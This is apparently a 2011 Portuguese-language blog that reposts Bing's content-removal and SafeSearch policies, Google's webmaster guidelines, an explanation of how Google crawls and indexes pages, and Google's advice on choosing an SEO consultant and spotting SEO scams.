    Alguns países mantêm leis ou regulamentos que se aplicam a provedores de serviços de busca, que exigem que removamos o acesso a determinadas inforamções que o Bing tenha indexado, principalmente para fins geopolíticos ou questões ou normas culturais legais. Devemos integrar nosso apoio à liberdade de acesso a informações por pessoas de todos os países com a conformidade necessária, que nos permita oferecer os serviços de busca em uma jurisdição específica. Quando abordados com uma solicitação de remoção de resultados de pesquisa por uma entidade do governo, exigiremos comprovação da lei aplicável e autoridade da agência governamental, bem como uma solicitação oficial que exija a remoção. Se tal comprovação for fornecida e pudermos verificá-la, então poderemos cumprir com a solicitação de remoção. Se nos for exigido a implementação da solicitação, faremos isso da forma mais próxima como exigido pela lei. Se a solicitação de remoção for inconsistente com os padrões internacionais, podemos escolher buscar esclarecimento adicional para nossa obrigação de cumprimento.

    Como lidamos com questões relacionadas a acesso a conteúdo para adultos

    O Bing oferece configurações de Safe Search, que permitem que a maioria dos usuários defina o tipo de filtragem de conteúdo para adultos que gostaria que fosse aplicado aos seus resultados de pesquisa. Por padrão, na maioria dos mercados todas as pesquisas são definidas como moderadas, o que restringe resultados de pesquisa explícitos visualmente mas não restringe texto explícito. Devido aos costumes locais ou normas culturais, determinados países podem impor restrições legais sobre a exibição de conteúdo para adultos. Como resultado, o que constitui conteúdo para adultos pode variar dependendo do mercado.
    O Bing categoriza determinados países como mercados restritos. Nesses mercados restritos, podemos restringir a exibição de conteúdo para adultos (como definido localmente) e, devido a costumes, normas e leis locais, podemos limitar as configurações do Safe Search apenas como "restritas". Definido como "restrito", o Safe Search filtra a exibição de conteúdo explícito nos resultados da pesquisa em imagens, vídeos e texto. Entre os mercados que estão limitados a "restrito" estão:
    • China
    • Hong Kong
    • Índia
    • Indonésia
    • Coreia
    • Malásia
    • Oriente Médio
    • Cingapura
    • Taiwan
    • Tailândia
    • Turquia
    Fonte:goo.gl/ihWh0

    terça-feira, 18 de janeiro de 2011

    Ajude o google encontrar seu site

    Ajude o google encontrar seu site
    Siga as diretrizes abaixo para ajudar o Google a encontrar, indexar e classificar o seu site. Mesmo que você decida não implementar as sugestões, recomendamos que preste atenção às "Diretrizes de qualidade", que destacam algumas práticas ilícitas que podem levar à remoção do seu site do índice do Google ou a outro tipo de penalidade. Se um site for penalizado, ele não será mais exibido nos resultados no Google.com.br ou em qualquer site parceiro do Google.

    Quando o seu site estiver pronto:
    Diretrizes de conteúdo e design
    • Construa um site com uma hierarquia clara e links de texto. Cada página deve ser acessada a partir de pelo menos um link de texto estático.
    • Mostre aos usuários um mapa do site que relacione o tópico às partes importantes do seu site. Se o mapa do site tiver muitos links, convém dividi-lo em várias páginas.
    • Utilize um número razoável de links por página.
    • Crie um site útil, com muitas informações e páginas que descrevam de forma clara e precisa o seu conteúdo.
    • Pense nas palavras que os usuários digitariam para encontrar as suas páginas e verifique se elas aparecem no seu site.
    • Tente usar texto, em vez de imagens, para exibir nomes, conteúdo ou links importantes. O rastreador do Google não reconhece texto contido em imagens. Se for necessário usar imagens para conteúdo de texto, avalie a possibilidade de usar o atributo "ALT" para incluir algumas palavras de texto descritivo.
    • Verifique se os elementos e os atributos alt são descritivos e precisos.
    • Verifique se há links quebrados e corrija o código HTML.
    • Se você decidir usar páginas dinâmicas (por exemplo, o URL que contém um caractere “?”), saiba que nem todos os spiders de mecanismos de pesquisa rastreiam as páginas dinâmicas e estáticas. Isso ajuda a manter os parâmetros curtos e a quantidade desses parâmetros pequena.
    • Analise as nossas diretrizes para imagens para conhecer as práticas recomendadas na publicação de imagens.
    Diretrizes técnicas
    • Use um navegador de texto como o Lynx para examinar o seu site, pois muitos spiders de mecanismos de pesquisa veem o site do mesmo modo que o Lynx. Se recursos especiais como JavaScript, cookies, IDs de sessão, frames, DHTML ou Flash permitirem que você veja todo o site em um navegador de texto, os spiders dos mecanismos de pesquisa poderão ter dificuldade em rastrear o seu site.
    • Deixe que os robôs de pesquisa rastreiem o seu site sem que IDs de sessão ou argumentos acompanhem suas trajetórias no site. Essas técnicas são úteis para monitorar um determinado comportamento do usuário, mas o padrão de acesso dos robôs é completamente diferente. Se você usar essas técnicas, a indexação do seu site poderá ser incompleta, já que os robôs talvez não consigam eliminar os URLs que têm aspecto diferente, mas que apontam para a mesma página.
    • Verifique se o servidor web suporta o cabeçalho "If-Modified-Since HTTP". Esse recurso permite que o servidor web informe ao Google se houve alteração no conteúdo desde o último rastreamento do site. A utilização desse recurso permite obter economia na largura de banda e nas despesas gerais.
    • Use o arquivo robots.txt no servidor web. Esse arquivo informa aos rastreadores quais diretórios podem ou não ser rastreados. Verifique se ele está disponível no site para que você não bloqueie acidentalmente o rastreador do Googlebot. Acesse http://www.robotstxt.org/faq.html para saber como instruir os robôs quando visitarem o site. Você pode testar seu arquivo robots.txt para verificar se está utilizando-o corretamente com a ferramenta de análise do robots.txt disponível nas Ferramentas do Google para webmasters.
    • Faça um esforço para garantir que os anúncios não interfiram nas classificações dos mecanismos de pesquisa. Por exemplo, os anúncios do Google AdSense e os links do DoubleClick têm o rastreamento bloqueado por um arquivo robots.txt.
    • Se a sua empresa adquirir um sistema de gerenciamento de conteúdo, verifique se o sistema cria páginas e links que podem ser rastreados pelos mecanismos de pesquisa.
    • Use o arquivo robots.txt para evitar a indexação de páginas de resultados de pesquisa ou outras páginas geradas automaticamente que não acrescentam valor para usuários provenientes de mecanismos de pesquisa.
    • Teste o site para verificar se ele aparece corretamente em navegadores diferentes.
    • Monitore o desempenho do seu site e otimize os tempos de carregamento. A meta do Google é fornecer aos usuários resultados mais relevantes e uma ótima experiência. Sites mais rápidos aumentam a satisfação do usuário e melhoram a qualidade geral da web (especialmente para os usuários com conexões lentas com a internet), e esperamos que, à medida que os webmasters aprimoram os seus sites, a velocidade geral da web melhore. O Google recomenda a todos os webmasters monitorar regularmente o desempenho do site usando o Page Speed, o YSlow, o WebPagetest ou outras ferramentas. Para obter mais informações, ferramentas e recursos, consulte Vamos tornar a web mais rápida. Além disso, a ferramenta Desempenho do site nas Ferramentas do Google para webmasters mostra a velocidade do seu site conforme a experiência de usuários do mundo todo.
    Diretrizes de qualidade
    Essas diretrizes de qualidade tratam das formas mais comuns de comportamento fraudulento ou manipulador, mas o Google pode responder de forma negativa a outras práticas enganosas que não estão listadas aqui (por exemplo, registrar sites com nomes semelhantes aos de sites conhecidos, mas com uma ligeira diferença ortográfica). O fato de uma determinada técnica fraudulenta não constar desta página não significa que ela seja aprovada pelo Google. Os webmasters que se esforçam para manter os princípios básicos certamente proporcionarão uma melhor experiência aos usuários e, consequentemente, obterão melhores classificações do que aqueles que perdem tempo à procura de atalhos e brechas.
    Se você acreditar que outro site está abusando das diretrizes de qualidade do Google, denuncie esse site em https://www.google.com/webmasters/tools/spamreport. O Google prefere resolver os problemas de forma automatizada e escalonável. Por isso, tentamos minimizar conflitos em relação a spams. As informações sobre spam que recebemos são usadas para criar algoritmos escalonáveis que reconheçam e bloqueiem futuras tentativas de spam.
    Diretrizes de qualidade - princípios básicos
    • Crie páginas principalmente para os usuários, não para os mecanismos de pesquisa. Não engane os seus usuários nem apresente aos mecanismos de pesquisa um conteúdo diferente daquele que você exibe aos usuários, o que normalmente é chamado de "cloaking" (camuflagem do conteúdo real da página).
    • Evite truques para melhorar a classificação nos mecanismos de pesquisa. Um bom parâmetro é imaginar se você se sentiria à vontade se tivesse que justificar as suas ações para um site concorrente. Outro teste útil é perguntar a si mesmo: "Isso ajudará os meus usuários? Eu faria isso se os mecanismos de pesquisa não existissem?"
    • Não participe de esquemas em que os links são usados para aumentar a classificação do seu site ou que utilizem o PageRank. Evite, principalmente, links para autores de spam ou para "más vizinhanças" na web, já que esses tipos de link podem prejudicar a classificação do seu site.
    • Não use programas não-autorizados para enviar páginas, verificar classificações etc. Esses programas consomem recursos de computação e violam os nossos Termos de Serviço O Google não recomenda a utilização de produtos como WebPosition Gold™, que enviam consultas automáticas ou programadas ao Google.
    Diretrizes de qualidade - diretrizes específicas
    Se concluir que o seu site não cumpre essas diretrizes, modifique-o para que ele cumpra as diretrizes e, em seguida solicite a reconsideração do seu site.


    Fonte:http://www.google.com/support/webmasters/bin/answer.py?answer=35769

    Conceitos básicos do Google: como o Google rastreia, indexa e publica na web.

    Conceitos básicos do Google: como o Google rastreia, indexa e publica na web.

    Ao sentar em frente ao seu computador e fazer uma pesquisa no Google, você visualiza quase que instantaneamente uma lista de resultados de toda a web. Como o Google encontra páginas que correspondem à sua consulta e determina a ordem dos resultados de pesquisa? Em termos mais simples, a pesquisa na web é como procurar em um livro muito grande com um índice impressionante que diz exatamente onde tudo está localizado. Quando você faz uma pesquisa no Google, os programas verificam o índice para determinar os resultados de pesquisa mais relevantes que devem ser retornados ("publicados") para você.
    Os três principais processos de retorno de resultados de pesquisa são:

    Rastreamento
                                                                
    O rastreamento é o processo pelo qual o Googlebot descobre páginas novas e atualizadas para serem incluídas no índice do Google.
    Nós usamos um grande conjunto de computadores para buscar (ou "rastrear") bilhões de páginas na web. O programa que faz a busca é chamado Googlebot (também conhecido como robô, bot ou spider). O Googlebot usa um processo de algoritmos: programas de computador que determinam quais sites devem ser indexados, com que frequência e quantas páginas devem ser buscadas em cada site.
    O processo de rastreamento do Google começa com uma lista de URLs de páginas web, gerada a partir de processos anteriores de rastreamento e aumentada com dados dos Sitemaps fornecidos por webmasters. Conforme o Googlebot visita cada um desses sites, ele detecta os links de cada página e os inclui na sua lista de páginas a serem rastreadas. Novos sites, alterações em sites existentes e links inativos serão detectados e usados para atualizar o índice do Google.
    O Google não aceita pagamento para rastrear um site com mais frequência, o mantem a área de pesquisa de  negócios separada dos serviços geradores de receita do AdWords.
    Indexação
                                                                  
    O Googlebot processa cada uma das páginas que ele rastreia para compilar um imenso índice com todas as palavras encontradas e sua localização em cada página. Além disso, processamos informações incluídas nos principais atributos e tags de conteúdo, como tags Title e atributos ALT. O Googlebot pode processar muitos tipos de conteúdo, mas não todos. Por exemplo, não podemos processar o conteúdo de alguns arquivos de mídia elaborada ou páginas dinâmicas.
    Publicação de resultados
                                                                
    Quando um usuário insere uma consulta, nossas máquinas pesquisam o índice de páginas correspondentes e retornam os resultados que acreditamos ser os mais relevantes para os usuários. A relevância é determinada por mais de 200 fatores, entre eles o PageRank para uma determinada página. O PageRank é a medida da importância de uma página com base nos links de entrada de outras páginas. Em termos mais simples, cada link para uma página em seu site a partir de outro site adiciona um PageRank ao seu site. Nem todos os links são iguais: o Google trabalha com afinco para melhorar a experiência do usuário, identificando links de spam e outras práticas que afetam negativamente os resultados de pesquisa. Os melhores tipos de links são aqueles retornados com base na qualidade do seu conteúdo.
    Para que o seu site seja bem classificado nas páginas de resultados de pesquisa, é importante verificar se o Google pode rastrear e indexar o seu site corretamente. As Diretrizes para webmasters destacam algumas das melhores práticas que podem ajudar você a evitar as armadilhas comuns e melhorar a classificação do seu site.
    Os recursos do Google Pesquisas relacionadas, Sugestões de ortografia e Google Suggest foram desenvolvidos para ajudar os usuários a economizar tempo exibindo termos relacionados, erros de digitação comuns e consultas populares. Como os  resultados de pesquisa do google.com.br, as palavras-chave usadas por esses recursos são geradas automaticamente rastreadores da web e algoritmos de pesquisa. Exibem essas sugestões apenas quando acham que podem economizar o tempo do usuário. Se um site estiver bem classificado para uma palavra-chave, é porque o google determinal com base em algoritmos que seu conteúdo é mais relevante para a consulta do usuário.


    Fonte:http://www.google.com/support/websearch/bin/answer.py?answer=106230

    segunda-feira, 17 de janeiro de 2011

    Otimização de mecanismos de pesquisa (SEO)

    SEO

    SEO é o acrônimo em inglês de "otimização do mecanismo de pesquisa" ou "otimizador do mecanismo de pesquisa". A contratação de um SEO é uma decisão importante que pode aperfeiçoar seu site e poupar tempo, mas você também corre o risco de prejudicar seu site e sua reputação. Pesquise as vantagens potenciais, bem como os danos que um SEO irresponsável pode causar ao seu site. Muitos SEOs e outros consultores e agências oferecem serviços úteis para proprietários de sites, incluindo:
    • Análise do conteúdo ou da estrutura do seu site
    • Consultoria técnica sobre desenvolvimento de sites: por exemplo, hospedagem, redirecionamentos, páginas de erro, uso do JavaScript
    • Desenvolvimento de conteúdo
    • Gerenciamento de campanhas de desenvolvimento de negócios on-line
    • Pesquisa de palavras-chave
    • Treinamento de SEO
    • Experiência em regiões e mercados específicos.
    A página de resultados do Google inclui resultados de pesquisa orgânicos e, frequentemente, publicidade paga (indicada pelo título "Links patrocinados") também. Anunciar no Google não terá qualquer efeito na presença do seu site em nossos resultados de pesquisa. O Google nunca aceita dinheiro para incluir ou classificar sites nos resultados de pesquisa; não há custos para aparecer em nossos resultados de pesquisa orgânicos. Recursos gratuitos, como as Ferramentas do Google para webmasters, o blog oficial do Google para webmasters e nosso fórum de discussão, podem oferecer excelentes informações sobre como otimizar o seu site para pesquisa orgânica. Muitas dessas fontes gratuitas, além de informações sobre pesquisa paga, podem ser encontradas na Central do webmaster do Google.
    Antes de iniciar sua pesquisa por um SEO, é recomendável tornar-se um consumidor informado e se familiarizar com o modo como os mecanismos de pesquisa funcionam. Recomendamos iniciar aqui:
    Se você estiver pensando em contratar um SEO, quanto antes melhor. Um bom momento para a contratação é quando você estiver pensando em mudar o design do site ou planejando lançar um novo site. Dessa maneira, você e o seu SEO podem garantir que o seu site seja criado para ser conveniente para mecanismos de pesquisa do início ao fim. Porém, um bom SEO também pode ajudar a melhorar um site existente.
    Algumas perguntas úteis a serem feitas a um SEO incluem
    • Você pode me mostrar exemplos de trabalhos anteriores e compartilhar algumas histórias de sucesso?
    • Você segue as Diretrizes do Google para webmasters?
    • Você oferece algum serviço ou orientação de marketing para complementar o seu negócio de pesquisa orgânico?
    • Que tipo de resultados você espera ver e em que período de tempo? Como você mede seu sucesso?
    • Qual é a sua experiência no meu setor?
    • Qual é a sua experiência no meu país ou em minha cidade?
    • Qual é a sua experiência no desenvolvimento de sites internacionais?
    • Quais são suas técnicas mais importantes de SEO?
    • Há quanto tempo você está no mercado?
    • Como me comunicarei com você? Você me informará sobre todas as alterações feitas no meu site e fornecerá informações detalhadas sobre suas recomendações e a lógica por trás delas?
    Embora os SEOs possam oferecer serviços valiosos aos clientes, alguns SEOs com comportamentos antiéticos são vistos com maus olhos no setor por suas práticas de marketing exageradamente agressivas e suas tentativas de manipular de forma inadequada os resultados dos mecanismos de pesquisa. Práticas que violam nossas diretrizes podem resultar em um ajuste negativo da presença do seu site no Google ou até mesmo na remoção do site do nosso índice. Veja alguns aspectos a serem considerados:
    • Tenha cuidado com firmas de SEO e consultores ou agências na web que enviam e-mails inesperados. Pode parecer incrível, mas nós também recebemos este tipo de spam:
      "Prezado google.com.br,
      Visitamos o seu site e constatamos que você não aparece na maioria dos principais diretórios e mecanismos de pesquisa..."
      Se você receber e-mails não solicitados sobre mecanismos de pesquisa, mantenha o mesmo ceticismo que teria em relação a pílulas dietéticas que "queimam a gordura enquanto você dorme" ou solicitações para ajudar a transferir o dinheiro de ditadores depostos.
    • Ninguém pode garantir a classificação em primeiro lugar no Google. Cuidado com os SEOs que dizem garantir a sua classificação ou ter um "relacionamento privilegiado" com o Google ou que anunciam um "envio prioritário" para o Google. Não existe envio prioritário para o Google. Na verdade, a única forma de enviar um site diretamente ao Google é através da nossa página Adicionar URLou enviando um Sitemap, e você pode fazer isso por conta própria sem custo algum.
    • Tome cuidado se uma empresa tiver muitos segredos ou não explicar claramente o que pretende. Se algo não estiver claro, peça explicações. Se um SEO criar um conteúdo fraudulento ou enganoso em seu nome, como páginas de entrada ou domínios "descartáveis", o seu site poderá ser removido do índice do Google. Em última análise, você é responsável pelas ações das empresas que contratar. Por isso, é melhor verificar exatamente como pretendem "ajudar" você. Se um SEO possui acesso ao FTP do seu servidor, ele deve explicar todas as alterações que estão sendo feitas no seu site.
    • Você nunca deve precisar ter um link para um SEO.Evite SEOs que falam do poder dos links "gratuitos e para todos", de esquemas de popularidade de links ou que enviam o seu site para milhares de mecanismos de pesquisa. Normalmente, essas ações são inúteis e não afetam a sua classificação nos resultados dos principais mecanismos de pesquisa; ao menos, não de uma forma que você consideraria positiva.
    • Escolha com cuidado. Em caso de dúvida em relação a um determinado SEO, pesquise o mercado. Evidentemente, você pode fazer isso no Google. Você também pode consultar algumas informações que saíram na imprensa, inclusive este artigo em inglês sobre um SEO especialmente agressivo: http://seattletimes.nwsource.com/html/businesstechnology/2002002970_nwbizbriefs12.html. Embora o Google não comente sobre empresas específicas, encontramos firmas que se autodenominam SEOs, as quais adotam práticas que obviamente ultrapassam o comportamento comercialmente aceitável. Tome cuidado.
    • Tente entender para onde o dinheiro está indo.O Google nunca vende as melhores classificações nos seus resultados de pesquisa, mas existem vários mecanismos de pesquisa que combinam os resultados de pesquisa normais com resultados pagos por clique ou por inclusão. Alguns SEOs prometem que você ocupará as primeiras posições nos mecanismos de pesquisa, mas na verdade aparecerá na seção de anúncios, e não nos resultados de pesquisa. Alguns SEOs chegam até a alterar o valor dos lances em tempo real para criar a ilusão de que "controlam" outros mecanismos de pesquisa e que podem escolher onde querem aparecer. Esse golpe não funciona com o Google, pois os nossos anúncios são identificados de forma clara e ficam separados dos nossos resultados de pesquisa. Mas pergunte ao seu SEO em potencial quais taxas se destinam à inclusão permanente e quais se destinam a anúncios temporários.
    • Quais são os abusos mais comuns que o proprietário de um site pode encontrar?
    • Um golpe comum é a criação de domínios "de fachada", que encaminham os usuários para um site por meio de redirecionamentos fraudulentos. Os domínios de fachada normalmente pertencem a um SEO que alega estar trabalhando em nome de um cliente. No entanto, se o relacionamento não vingar, o SEO poderá apontar o domínio para outro site ou até mesmo para o domínio de um concorrente. Se isso acontecer, o cliente pagou para criar um site concorrente que pertence ao SEO. Outra prática ilícita é colocar páginas "de entrada" carregadas de palavras-chave em algum lugar do site do cliente. O SEO promete que isso tornará a página mais relevante para um maior número de consultas. Essa afirmação é inerentemente falsa, já que uma única página é raramente relevante para várias palavras-chave. Pior ainda é que essas páginas de entrada frequentemente contêm links ocultos que levam também a outros clientes do SEO. Tais páginas de entrada sugam a popularidade dos links do site e encaminham para o SEO e seus outros clientes, que podem ter sites com conteúdo ilegal ou ofensivo.
    • Que outras coisas eu devo verificar?
    • Alguns sinais de alerta podem indicar que você está lidando com um SEO desonesto. Esta não é uma lista completa, por isso, em caso de dúvida, siga o seu instinto. E, principalmente, não pense duas vezes em desistir se o seu SEO:
      • tiver domínios de fachada
      • colocar links para outros clientes nas páginas de entrada
      • oferecer a venda de palavras-chave na barra de endereços
      • não distinguir entre verdadeiros resultados de pesquisa e anúncios exibidos nos resultados de pesquisa
      • garantir a classificação, mas somente para frases de palavras-chave longas e obscuras, que você obteria de qualquer forma
      • utilizar diversos aliases ou informações WHOIS falsas
      • obtiver tráfego a partir de "falsos" mecanismos de pesquisa, spyware ou scumware
      • tiver tido domínios excluídos do índice do Google ou se ele mesmo não estiver listado no Google
      Se você achar que foi enganado por um SEO, convém denunciar o fato. Nos Estados Unidos, a FTC (Comissão Federal de Comércio) cuida das reclamações relacionadas a práticas comerciais enganosas ou ilegais. Para registrar uma reclamação, acesse: http://www.ftc.gov/ e clique em "File a Complaint Online" (Registrar uma reclamação on-line), ligue para 1-877-FTC-HELP ou escreva para:
      Federal Trade Commission CRC-240 Washington, D.C. 20580
      Se a sua reclamação for contra uma empresa em outro país, registre-a em http://www.econsumer.gov/. Fonte:http://www.google.com/support/webmasters/bin/answer.py?hl=pt-br&answer=35291